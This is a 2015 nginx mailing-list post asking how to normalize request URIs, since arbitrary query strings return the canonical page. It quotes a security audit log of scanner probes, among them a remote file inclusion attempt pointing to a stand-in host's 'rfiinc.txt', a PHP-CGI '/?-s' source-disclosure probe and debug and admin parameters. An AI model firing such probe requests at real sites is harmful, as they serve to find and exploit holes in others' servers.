canonicalization of $uri with "/?.*" content

173279834462 nginx-forum at nginx.us
Thu Apr 16 14:13:33 UTC 2015


The last security audit revealed the following: 

V:Wed Apr 15 20:58:19 2015 - 200 for GET: /?mod=node&nid=some_thing&op=view
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?OpenServer
V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1
V:Wed Apr 15 20:59:40 2015 - 200 for GET:
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
V:Wed Apr 15 20:59:40 2015 - 200 for GET:
/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET:
/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET:
/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?PageServices
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?wp-cs-dump
V:Wed Apr 15 21:03:06 2015 - 200 for GET: /?D=A
V:Wed Apr 15 21:04:58 2015 - 200 for GET:
/?_CONFIG[files][functions_page]=http://example.com/rfiinc.txt?
V:Wed Apr 15 21:08:00 2015 - 200 for GET: /?-s
V:Wed Apr 15 21:08:09 2015 - 200 for GET: /?q[]=x
V:Wed Apr 15 21:08:41 2015 - 200 for GET: /?sc_mode=edit
V:Wed Apr 15 21:09:30 2015 - 200 for GET: /?admin

In plain words, there is an infinite amount of $request_uri that returns the
content of the canonical address. 

You can test your own domain "example.com":

canonical:
http://example.com/

unwanted variants:
http://example.com/?mod=node&nid=some_thing&op=view
http://example.com/?Open
http://example.com/?OpenServer
...

Is there an nginx parameter to normalize this type of $uri?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,258101,258101#msg-258101



More information about the nginx mailing list